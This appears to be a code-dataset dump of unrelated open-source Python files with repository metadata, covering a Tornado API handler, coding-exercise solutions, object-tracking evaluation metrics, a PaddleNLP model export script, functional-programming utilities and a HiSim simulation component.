Bank competition and stability: cross-country heterogeneity, *Journal of Financial Intermediation*, 22, 2, 218-244.
* [Delis, Hasan, and Tsionas (2014)](https://doi.org/10.1016/j.jbankfin.2014.03.024),
The risk of financial intermediaries, *Journal of Banking & Finance*, 44, 1-12.
* [Fang, Hasan, and Marton (2014)](https://doi.org/10.1016/j.jbankfin.2013.11.003),
Institutional development and bank stability: Evidence from transition countries, *Journal of Banking & Finance*, 39, 160-176.
"""
return (roa + capital_ratio) / np.std(past_roas)
| 48.641509 | 138 | 0.653607 |
ba066e403d0a2fcc3e236db9bda922b65a5fae78
| 1,650 |
py
|
Python
|
handler/GenericApiHandler.py
|
wchming1987/Tumbler
|
e309771779c8eb44e685adbb691a428d29009e05
|
[
"Apache-2.0"
] | null | null | null |
handler/GenericApiHandler.py
|
wchming1987/Tumbler
|
e309771779c8eb44e685adbb691a428d29009e05
|
[
"Apache-2.0"
] | null | null | null |
handler/GenericApiHandler.py
|
wchming1987/Tumbler
|
e309771779c8eb44e685adbb691a428d29009e05
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding=utf-8 -*-
import json
from tornado.web import RequestHandler, HTTPError
import pymongo
FORM_REPRESENTATION = ''
JSON_REPRESENTATION = 'application/json'
HTTP_BAD_REQUEST = 400
HTTP_FORBIDDEN = 403
HTTP_NOT_FOUND = 404
class GenericApiHandler(RequestHandler):
    """
    The purpose of this class is to take advantage of inheritance and to
    prepare a set of common functions for the handlers.
    """
    def __init__(self, application, request, **kwargs):
        self.database = None
        self.param_args = None
        super(GenericApiHandler, self).__init__(application, request, **kwargs)

    def initialize(self, database):
        self.database = database

    def prepare(self):
        if not (self.request.method == "GET" or self.request.method == "DELETE"):
            if self.request.headers.get("Content-Type") is not None:
                if self.request.headers["Content-Type"].startswith(JSON_REPRESENTATION):
                    try:
                        self.param_args = json.loads(self.request.body)
                    except (ValueError, KeyError, TypeError) as error:
                        raise HTTPError(HTTP_BAD_REQUEST,
                                        "Bad Json format [{}]".
                                        format(error))
                elif self.request.headers["Content-Type"].startswith(FORM_REPRESENTATION):
                    pass
                else:
                    pass

    def finish_request(self, json_object):
        self.write(json.dumps(json_object))
        self.set_header("Content-Type", JSON_REPRESENTATION)
        self.finish()
| 31.730769 | 90 | 0.600606 |
ba29ca9bbdfa4034dfe13b1f64ea12d30bbf4923
| 3,446 |
py
|
Python
|
7-assets/past-student-repos/LambdaSchool-master/m7/74a1/day2.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m7/74a1/day2.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m7/74a1/day2.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
# Problem 1: Two Sum
class Solution(object):
    def twoSum(self, nums, target):
        """
        :type nums: List[int]
        :type target: int
        :rtype: List[int]
        """
        # Given an array of integers, return indices of the two numbers such that they add up to a specific target.
        # You may assume that each input would have exactly one solution, and you may not use the same element twice.
        # total = 0
        # for key, value in nums
        # total = total + value
        # for key1, value1 in nums
        # if key != key1
        # total = total + value1
        # if total == target
        # return [key, key1]
        total = 0
        for x in range(0, len(nums)):
            total = 0
            for y in range(0, len(nums)):
                if x != y:
                    total = nums[x] + nums[y]
                    if total == target:
                        return [x, y]


# Problem 2: Implement a Queue Using Stacks
class MyQueue(object):
    # Implement the following operations of a queue (FIFO) using stacks (LIFO).
    # Depending on your language, stack may not be supported natively. You may simulate a stack by using a list or deque(double-ended queue), as long as you use only standard operations of a stack.
    # You may assume that all operations are valid (for example, no pop or peek operations will be called on an empty queue).
    # You must use only standard operations of a stack -- which means only:
    #   peek from top
    #   pop from top
    #   push to bottom
    #   size
    #   is empty
    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.stack1 = []
        self.stack2 = []

    def push(self, x):
        """
        Push element x to the back of queue.
        :type x: int
        :rtype: None
        """
        # while self.stack1 not empty, append its last element to stack2
        while self.stack1:
            popped1 = self.stack1.pop()
            self.stack2.append(popped1)
        # then append x to stack1, which is empty
        self.stack1.append(x)
        # then put all the other elements, now on stack2, back on stack1
        while self.stack2:
            popped2 = self.stack2.pop()
            self.stack1.append(popped2)

    def pop(self):
        """
        Removes the element from in front of queue and returns that element.
        :rtype: int
        """
        # remove last element of stack, which is front element of queue, and return it
        popped = self.stack1.pop()
        return popped

    def peek(self):
        """
        Get the front element.
        :rtype: int
        """
        # return last element of stack, which is front element of queue (no removal)
        front_element = self.stack1[-1]
        return front_element

    def empty(self):
        """
        Returns whether the queue is empty.
        :rtype: bool
        """
        # if both stacks are empty, return true; else return false
        if not self.stack1 and not self.stack2:
            is_empty = True
        else:
            is_empty = False
        return is_empty
# Your MyQueue object will be instantiated and called as such:
# obj = MyQueue()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.peek()
# param_4 = obj.empty()
| 30.767857 | 201 | 0.548172 |
2cfb8a9e6c36a1c557b03fb7463c8e214fbe1449
| 92 |
py
|
Python
|
2014/09/table-state-debt-protections/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | 14 |
2015-05-08T13:41:51.000Z
|
2021-02-24T12:34:55.000Z
|
2014/09/table-state-debt-protections/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | null | null | null |
2014/09/table-state-debt-protections/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | 7 |
2015-04-04T04:45:54.000Z
|
2021-02-18T11:12:48.000Z
|
#!/usr/bin/env python
COPY_GOOGLE_DOC_KEY = '1UfWWQPek40kyjAu13zIbNkvUjUxsyDHw-xvFAZZjsLA'
| 23 | 68 | 0.836957 |
d70a2d0e05afce86a65eb5c0c7b0b4b335355c51
| 628 |
py
|
Python
|
Interview Preparation Kits/Interview Preparation Kit/Sorting/Sorting: Bubble Sort/bubble_sort.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | 1 |
2021-02-22T17:37:45.000Z
|
2021-02-22T17:37:45.000Z
|
Interview Preparation Kits/Interview Preparation Kit/Sorting/Sorting: Bubble Sort/bubble_sort.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | null | null | null |
Interview Preparation Kits/Interview Preparation Kit/Sorting/Sorting: Bubble Sort/bubble_sort.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the countSwaps function below.
def countSwaps(a):
    n = len(a)
    count = 0
    for i in range(n):
        for j in range(n-1):
            if a[j] > a[j+1]:
                tmp = a[j]
                a[j] = a[j+1]
                a[j+1] = tmp
                count += 1
    print("Array is sorted in "+str(count)+" swaps.")
    print("First Element: "+str(a[0]))
    print("Last Element: "+str(a[n-1]))
    return


if __name__ == '__main__':
    n = int(input())
    a = list(map(int, input().rstrip().split()))
    countSwaps(a)
| 18.470588 | 53 | 0.506369 |
d15f8f420c6ec1a3e00d5a89ac3ae1f28d487841
| 394 |
py
|
Python
|
Versuch3/task1.1.py
|
Tobias-Schoch/SSS
|
f8b078ca7f6482fc7c89d5f9e784a549459eefb7
|
[
"MIT"
] | null | null | null |
Versuch3/task1.1.py
|
Tobias-Schoch/SSS
|
f8b078ca7f6482fc7c89d5f9e784a549459eefb7
|
[
"MIT"
] | null | null | null |
Versuch3/task1.1.py
|
Tobias-Schoch/SSS
|
f8b078ca7f6482fc7c89d5f9e784a549459eefb7
|
[
"MIT"
] | 1 |
2022-01-06T12:47:53.000Z
|
2022-01-06T12:47:53.000Z
|
from TekTDS2000 import *
scope = TekTDS2000()
# Read in channel 1 and channel 2
scope.saveCsv(filename='versuch3/kleinerLautsprecher/100.csv', ch=1)
scope.saveCsv(filename='100_2.csv', ch=2)
# Read in the frequency and the period
frequency = scope.getFreq(1)
period = scope.getPeriod(1)
# Print the frequency and the period
print("Frequenz", frequency)
print("Periode", period)
| 26.266667 | 68 | 0.766497 |
0f05a017ee32868d8d4019d8110cff01aedb2524
| 8,457 |
py
|
Python
|
research/cv/siamRPN/src/evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/siamRPN/src/evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/siamRPN/src/evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" evaluation """
import numpy as np
from shapely.geometry import Polygon
def calculate_eao(dataset_name, all_failures, all_overlaps, gt_traj_length, skipping=5):
'''
input:dataset name
all_failures: type is list , index of failure
all_overlaps: type is list , length of list is the length of all_failures
gt_traj_length: type is list , length of list is the length of all_failures
skipping:number of skipping per failing
'''
if dataset_name == "VOT2016":
low = 108
high = 371
elif dataset_name == "VOT2015":
low = 108
high = 371
fragment_num = sum([len(x)+1 for x in all_failures])
max_len = max([len(x) for x in all_overlaps])
tags = [1] * max_len
seq_weight = 1 / (1 + 1e-10) # division by zero
eao = {}
# prepare segments
fweights = np.ones(fragment_num, dtype=np.float32) * np.nan
fragments = np.ones((fragment_num, max_len), dtype=np.float32) * np.nan
seg_counter = 0
for traj_len, failures, overlaps in zip(gt_traj_length, all_failures, all_overlaps):
if failures:
points = [x+skipping for x in failures if
x+skipping <= len(overlaps)]
points.insert(0, 0)
for i, _ in enumerate(points):
if i != len(points) - 1:
fragment = np.array(overlaps[points[i]:points[i+1]+1], dtype=np.float32)
fragments[seg_counter, :] = 0
else:
fragment = np.array(overlaps[points[i]:], dtype=np.float32)
fragment[np.isnan(fragment)] = 0
fragments[seg_counter, :len(fragment)] = fragment
if i != len(points) - 1:
tag_value = tags[points[i]:points[i+1]+1]
w = sum(tag_value) / (points[i+1] - points[i]+1)
fweights[seg_counter] = seq_weight * w
else:
tag_value = tags[points[i]:len(overlaps)]
w = sum(tag_value) / (traj_len - points[i]+1e-16)
fweights[seg_counter] = seq_weight * w
seg_counter += 1
else:
# no failure
max_idx = min(len(overlaps), max_len)
fragments[seg_counter, :max_idx] = overlaps[:max_idx]
tag_value = tags[0: max_idx]
w = sum(tag_value) / max_idx
fweights[seg_counter] = seq_weight * w
seg_counter += 1
expected_overlaps = calculate_expected_overlap(fragments, fweights)
print(len(expected_overlaps))
# calculate eao
weight = np.zeros((len(expected_overlaps)))
weight[low-1:high-1+1] = 1
expected_overlaps = np.array(expected_overlaps, dtype=np.float32)
is_valid = np.logical_not(np.isnan(expected_overlaps))
eao_ = np.sum(expected_overlaps[is_valid] * weight[is_valid]) / np.sum(weight[is_valid])
eao = eao_
return eao
def calculate_expected_overlap(fragments, fweights):
""" compute expected iou """
max_len = fragments.shape[1]
expected_overlaps = np.zeros((max_len), np.float32)
expected_overlaps[0] = 1
# TODO Speed Up
for i in range(1, max_len):
mask = np.logical_not(np.isnan(fragments[:, i]))
if np.any(mask):
fragment = fragments[mask, 1:i+1]
seq_mean = np.sum(fragment, 1) / fragment.shape[1]
expected_overlaps[i] = np.sum(seq_mean *
fweights[mask]) / np.sum(fweights[mask])
return expected_overlaps
def calculate_accuracy_failures(pred_trajectory, gt_trajectory, \
bound=None):
'''
args:
pred_trajectory:list of bbox
gt_trajectory: list of bbox ,shape == pred_trajectory
bound :w and h of img
return :
overlaps:list ,iou value in pred_trajectory
acc : mean iou value
failures: failures point in pred_trajectory
num_failures: number of failres
'''
overlaps = []
failures = []
for i, pred_traj in enumerate(pred_trajectory):
if len(pred_traj) == 1:
if pred_trajectory[i][0] == 2:
failures.append(i)
overlaps.append(float("nan"))
else:
if bound is not None:
poly_img = Polygon(np.array([[0, 0],\
[0, bound[1]],\
[bound[0], bound[1]],\
[bound[0], 0]])).convex_hull
if len(gt_trajectory[i]) == 8:
poly_pred = Polygon(np.array([[pred_trajectory[i][0], pred_trajectory[i][1]], \
[pred_trajectory[i][2], pred_trajectory[i][1]], \
[pred_trajectory[i][2], pred_trajectory[i][3]], \
[pred_trajectory[i][0], pred_trajectory[i][3]] \
])).convex_hull
poly_gt = Polygon(np.array(gt_trajectory[i]).reshape(4, 2)).convex_hull
if bound is not None:
gt_inter_img = poly_gt.intersection(poly_img)
pred_inter_img = poly_pred.intersection(poly_img)
inter_area = gt_inter_img.intersection(pred_inter_img).area
overlap = inter_area /(gt_inter_img.area + pred_inter_img.area - inter_area)
else:
inter_area = poly_gt.intersection(poly_pred).area
overlap = inter_area / (poly_gt.area + poly_pred.area - inter_area)
elif len(gt_trajectory[i]) == 4:
overlap = iou(np.array(pred_trajectory[i]).reshape(-1, 4), np.array(gt_trajectory[i]).reshape(-1, 4))
overlaps.append(overlap)
acc = 0
num_failures = len(failures)
if overlaps:
acc = np.nanmean(overlaps)
return acc, overlaps, failures, num_failures
def judge_failures(pred_bbox, gt_bbox, threshold=0):
"""" judge whether to fail or not """
if len(gt_bbox) == 4:
if iou(np.array(pred_bbox).reshape(-1, 4), np.array(gt_bbox).reshape(-1, 4)) > threshold:
return False
else:
poly_pred = Polygon(np.array([[pred_bbox[0], pred_bbox[1]], \
[pred_bbox[2], pred_bbox[1]], \
[pred_bbox[2], pred_bbox[3]], \
[pred_bbox[0], pred_bbox[3]] \
])).convex_hull
poly_gt = Polygon(np.array(gt_bbox).reshape(4, 2)).convex_hull
inter_area = poly_gt.intersection(poly_pred).area
overlap = inter_area / (poly_gt.area + poly_pred.area - inter_area)
if overlap > threshold:
return False
return True
def iou(box1, box2):
""" compute iou """
box1, box2 = box1.copy(), box2.copy()
N = box1.shape[0]
K = box2.shape[0]
box1 = np.array(box1.reshape((N, 1, 4)))+np.zeros((1, K, 4))#box1=[N,K,4]
box2 = np.array(box2.reshape((1, K, 4)))+np.zeros((N, 1, 4))#box1=[N,K,4]
x_max = np.max(np.stack((box1[:, :, 0], box2[:, :, 0]), axis=-1), axis=2)
x_min = np.min(np.stack((box1[:, :, 2], box2[:, :, 2]), axis=-1), axis=2)
y_max = np.max(np.stack((box1[:, :, 1], box2[:, :, 1]), axis=-1), axis=2)
y_min = np.min(np.stack((box1[:, :, 3], box2[:, :, 3]), axis=-1), axis=2)
tb = x_min-x_max
lr = y_min-y_max
tb[np.where(tb < 0)] = 0
lr[np.where(lr < 0)] = 0
over_square = tb*lr
all_square = (box1[:, :, 2] - box1[:, :, 0]) * (box1[:, :, 3] - box1[:, :, 1]) + (box2[:, :, 2] - \
box2[:, :, 0]) * (box2[:, :, 3] - box2[:, :, 1]) - over_square
return over_square / all_square
| 41.053398 | 117 | 0.554097 |
0e5f207e1c579d7f5fa8a8929dfe91a057ab4b6e
| 2,604 |
py
|
Python
|
examples/text_correction/ernie-csc/export_model.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
examples/text_correction/ernie-csc/export_model.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
examples/text_correction/ernie-csc/export_model.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: UTF-8 -*-
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import paddle
from paddle.static import InputSpec
from paddlenlp.data import Vocab
from paddlenlp.transformers import ErnieModel
from model import ErnieForCSC
# yapf: disable
parser = argparse.ArgumentParser(__doc__)
parser.add_argument("--params_path", type=str, default='./checkpoints/final.pdparams', help="The path of model parameter to be loaded.")
parser.add_argument("--output_path", type=str, default='./infer_model/static_graph_params', help="The path of model parameter in static graph to be saved.")
parser.add_argument("--model_name_or_path", type=str, default="ernie-1.0", choices=["ernie-1.0"], help="Pretraining model name or path")
parser.add_argument("--pinyin_vocab_file_path", type=str, default="pinyin_vocab.txt", help="pinyin vocab file path")
args = parser.parse_args()
# yapf: enable
def main():
    pinyin_vocab = Vocab.load_vocabulary(args.pinyin_vocab_file_path,
                                         unk_token='[UNK]',
                                         pad_token='[PAD]')
    ernie = ErnieModel.from_pretrained(args.model_name_or_path)
    model = ErnieForCSC(ernie,
                        pinyin_vocab_size=len(pinyin_vocab),
                        pad_pinyin_id=pinyin_vocab[pinyin_vocab.pad_token])
    model_dict = paddle.load(args.params_path)
    model.set_dict(model_dict)
    model.eval()
    model = paddle.jit.to_static(model,
                                 input_spec=[
                                     InputSpec(shape=[None, None],
                                               dtype="int64",
                                               name='input_ids'),
                                     InputSpec(shape=[None, None],
                                               dtype="int64",
                                               name='pinyin_ids')
                                 ])
    paddle.jit.save(model, args.output_path)


if __name__ == "__main__":
    main()
| 40.6875 | 156 | 0.622888 |
70d5ff9cb1047424cb3978c8a7246c8748053807
| 1,073 |
py
|
Python
|
apps/quiver/migrations/0004_analyticsserviceexecution.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 2 |
2017-12-17T21:28:22.000Z
|
2018-02-02T14:44:58.000Z
|
apps/quiver/migrations/0004_analyticsserviceexecution.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 118 |
2017-10-31T13:45:09.000Z
|
2018-02-24T20:51:42.000Z
|
apps/quiver/migrations/0004_analyticsserviceexecution.py
|
OpenAdaptronik/Rattler
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0 on 2019-04-26 12:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('quiver', '0003_auto_20190408_1347'),
    ]

    operations = [
        migrations.CreateModel(
            name='AnalyticsServiceExecution',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('last_state', models.IntegerField(default=1)),
                ('last_contact', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
                ('service', models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='quiver.AnalyticsService')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user')),
            ],
        ),
    ]
| 38.321429 | 139 | 0.665424 |
70db54441aa54b5c1826421c2524a53b1fb554a1
| 5,083 |
py
|
Python
|
src/pfun/functions.py
|
suned/pfun
|
46c460646487abfef897bd9627891f6cf7870774
|
[
"MIT"
] | 126 |
2019-09-16T15:28:20.000Z
|
2022-03-20T10:57:53.000Z
|
src/pfun/functions.py
|
suned/pfun
|
46c460646487abfef897bd9627891f6cf7870774
|
[
"MIT"
] | 54 |
2019-09-30T08:44:01.000Z
|
2022-03-20T11:10:00.000Z
|
src/pfun/functions.py
|
suned/pfun
|
46c460646487abfef897bd9627891f6cf7870774
|
[
"MIT"
] | 11 |
2020-01-02T08:32:46.000Z
|
2022-03-20T11:10:24.000Z
|
import functools
import inspect
from typing import Any, Callable, Generic, Tuple, TypeVar
from .immutable import Immutable
A = TypeVar('A')
B = TypeVar('B')
C = TypeVar('C')
def identity(v: A) -> A:
"""
The identity function. Just gives back its argument
Example:
>>> identity('value')
'value'
Args:
v: The value to get back
Return:
`v`
"""
return v
Unary = Callable[[A], B]
Predicate = Callable[[A], bool]
class Always(Generic[A], Immutable):
"""
A Callable that always returns the same value
regardless of the arguments
Example:
>>> f = Always(1)
>>> f(None)
1
>>> f('')
1
>>> "... and so on..."
"""
value: A
def __call__(self, *args, **kwargs) -> A:
return self.value
def always(value: A) -> Callable[..., A]:
"""
Get a function that always returns `value`
Example:
>>> f = always(1)
>>> f(None)
1
>>> f('')
1
>>> "... and so on..."
Args:
value: The value to return always
Return:
function that always returns `value`
"""
return Always(value)
class Composition(Immutable):
functions: Tuple[Callable, ...]
def __repr__(self) -> str:
functions_repr = ', '.join(repr(f) for f in self.functions)
return f'compose({functions_repr})'
def __call__(self, *args, **kwargs):
fs = reversed(self.functions)
first, *rest = fs
last_result = first(*args, **kwargs)
for f in rest:
last_result = f(last_result)
return last_result
def compose(
f: Callable[[Any], Any],
g: Callable[[Any], Any],
*functions: Callable[[Any], Any]
) -> Callable[[Any], Any]:
"""
Compose functions from left to right
Example:
>>> f = lambda v: v * 2
>>> g = compose(str, f)
>>> g(3)
"6"
Args:
f: the outermost function in the composition
g: the function to be composed with f
functions: functions to be composed with `f` \
and `g` from left to right
Return:
`f` composed with `g` composed with `functions` from left to right
"""
fs: Tuple[Callable, ...] = ()
for h in (f, g) + functions:
if isinstance(h, Composition):
fs += h.functions
else:
fs += (h,)
return Composition(fs)
def pipeline(
first: Callable[[Any], Any],
second: Callable[[Any], Any],
*rest: Callable[[Any], Any]
):
"""
Compose functions from right to left
Example:
>>> f = lambda v: v * 2
>>> g = pipeline(f, str)
>>> g(3)
"6"
Args:
first: the innermost function in the composition
g: the function to compose with f
functions: functions to compose with `first` and \
`second` from right to left
Return:
`rest` composed from right to left, composed with \
`second` composed with `first`
"""
return compose(*reversed(rest), second, first)
class Curry:
_f: Callable
def __init__(self, f: Callable):
functools.wraps(f)(self)
self._f = f # type: ignore
def __repr__(self):
return f'curry({repr(self._f)})'
def __call__(self, *args, **kwargs):
signature = inspect.signature(self._f)
bound = signature.bind_partial(*args, **kwargs)
bound.apply_defaults()
arg_names = {a for a in bound.arguments.keys()}
parameters = {p for p in signature.parameters.keys()}
if parameters - arg_names == set():
return self._f(*args, **kwargs)
if isinstance(self._f, functools.partial):
partial = functools.partial(
self._f.func,
*(self._f.args + args),
**self._f.keywords,
**kwargs
)
else:
partial = functools.partial(self._f, *args, **kwargs)
return Curry(partial)
def curry(f: Callable) -> Callable:
"""
Get a version of ``f`` that can be partially applied
Example:
>>> f = lambda a, b: a + b
>>> f_curried = curry(f)
>>> f_curried(1)
functools.partial(<function <lambda> at 0x1051f0950>, a=1)
>>> f_curried(1)(1)
2
Args:
f: The function to curry
Returns:
Curried version of ``f``
"""
@functools.wraps(f)
def decorator(*args, **kwargs):
return Curry(f)(*args, **kwargs)
return decorator
def flip(f: Callable) -> Callable:
"""
Reverse the order of positional arguments of `f`
Example:
>>> f = lambda a, b, c: (a, b, c)
>>> flip(f)('a', 'b', 'c')
('c', 'b', 'a')
Args:
f: Function to flip positional arguments of
Returns:
Function with positional arguments flipped
"""
return curry(lambda *args, **kwargs: f(*reversed(args), **kwargs))
__all__ = [
'curry', 'always', 'compose', 'pipeline', 'identity', 'Unary', 'Predicate'
]
| 22.793722 | 78 | 0.540822 |
1debc1d832e5bb7b7bbae724c08f377029080340
| 1,631 |
py
|
Python
|
hisim/components/transformer.py
|
sdickler/HiSim
|
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
|
[
"MIT"
] | 12 |
2021-10-05T11:38:24.000Z
|
2022-03-25T09:56:08.000Z
|
hisim/components/transformer.py
|
sdickler/HiSim
|
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
|
[
"MIT"
] | 6 |
2021-10-06T13:27:55.000Z
|
2022-03-10T12:55:15.000Z
|
hisim/components/transformer.py
|
sdickler/HiSim
|
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
|
[
"MIT"
] | 4 |
2022-02-21T19:00:50.000Z
|
2022-03-22T11:01:38.000Z
|
# Owned
from hisim.component import Component, SingleTimeStepValues, ComponentInput, ComponentOutput
from hisim import loadtypes as lt
from hisim.simulationparameters import SimulationParameters
class Transformer(Component):
    TransformerInput = "Input1"
    TransformerInput2 = "Optional Input1"
    TransformerOutput = "MyTransformerOutput"
    TransformerOutput2 = "MyTransformerOutput2"

    def __init__(self, name: str, my_simulation_parameters: SimulationParameters):
        super().__init__(name=name, my_simulation_parameters=my_simulation_parameters)
        self.input1: ComponentInput = self.add_input(self.ComponentName, Transformer.TransformerInput, lt.LoadTypes.Any, lt.Units.Any, True)
        self.input2: ComponentInput = self.add_input(self.ComponentName, Transformer.TransformerInput2, lt.LoadTypes.Any, lt.Units.Any, False)
        self.output1: ComponentOutput = self.add_output(self.ComponentName, Transformer.TransformerOutput, lt.LoadTypes.Any, lt.Units.Any)
        self.output2: ComponentOutput = self.add_output(self.ComponentName, Transformer.TransformerOutput2, lt.LoadTypes.Any, lt.Units.Any)

    def i_save_state(self):
        pass

    def i_doublecheck(self, timestep: int, stsv: SingleTimeStepValues):
        pass

    def i_restore_state(self):
        pass

    def i_simulate(self, timestep: int, stsv: SingleTimeStepValues, force_convergence: bool):
        startval_1 = stsv.get_input_value(self.input1)
        startval_2 = stsv.get_input_value(self.input2)
        stsv.set_output_value(self.output1, startval_1 * 5)
        stsv.set_output_value(self.output2, startval_2 * 1000)
| 49.424242 | 142 | 0.761496 |
aaa226c57c900244d0bdf47c3c39dd9ba552ab93
| 948 |
py
|
Python
|
7-assets/past-student-repos/LambdaSchool-master/m7/71e1/hashtables/ex1/ex1_tests.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m7/71e1/hashtables/ex1/ex1_tests.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
7-assets/past-student-repos/LambdaSchool-master/m7/71e1/hashtables/ex1/ex1_tests.py
|
eengineergz/Lambda
|
1fe511f7ef550aed998b75c18a432abf6ab41c5f
|
[
"MIT"
] | null | null | null |
import unittest
from ex1 import get_indices_of_item_weights
class TestEx1(unittest.TestCase):
    def test_ex1_1(self):
        weights_1 = [9]
        answer_1 = get_indices_of_item_weights(weights_1, 1, 9)
        self.assertTrue(answer_1 is None)

    def test_ex1_2(self):
        weights_2 = [4, 4]
        answer_2 = get_indices_of_item_weights(weights_2, 2, 8)
        self.assertTrue(answer_2[0] == 1)
        self.assertTrue(answer_2[1] == 0)

    def test_ex1_3(self):
        weights_3 = [4, 6, 10, 15, 16]
        answer_3 = get_indices_of_item_weights(weights_3, 5, 21)
        self.assertTrue(answer_3[0] == 3)
        self.assertTrue(answer_3[1] == 1)

    def test_ex1_4(self):
        weights_4 = [12, 6, 7, 14, 19, 3, 0, 25, 40]
        answer_4 = get_indices_of_item_weights(weights_4, 9, 7)
        self.assertTrue(answer_4[0] == 6)
        self.assertTrue(answer_4[1] == 2)


if __name__ == '__main__':
    unittest.main()
| 27.882353 | 64 | 0.630802 |
aac65c2443408dd44a2a1ed03cb6be2dea43106e
| 1,530 |
py
|
Python
|
bearpi-hm_nano-oh_flower/00_src/bearpi-hm_nano_oh_fun/build/lite/setup.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | 1 |
2022-02-15T08:51:55.000Z
|
2022-02-15T08:51:55.000Z
|
hihope_neptune-oh_hid/00_src/v0.3/build/lite/setup.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
hihope_neptune-oh_hid/00_src/v0.3/build/lite/setup.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from setuptools import setup
WORK_PATH = os.path.dirname(__file__)
README_PATH = os.path.join(WORK_PATH, 'README.md')
LICENSE_PATH = os.path.join(WORK_PATH, 'LICENSE')
LONG_DESCRIPTION = open(README_PATH, 'rt', encoding='utf-8').read()
LICENSE = open(LICENSE_PATH, 'rt', encoding='utf-8').read()
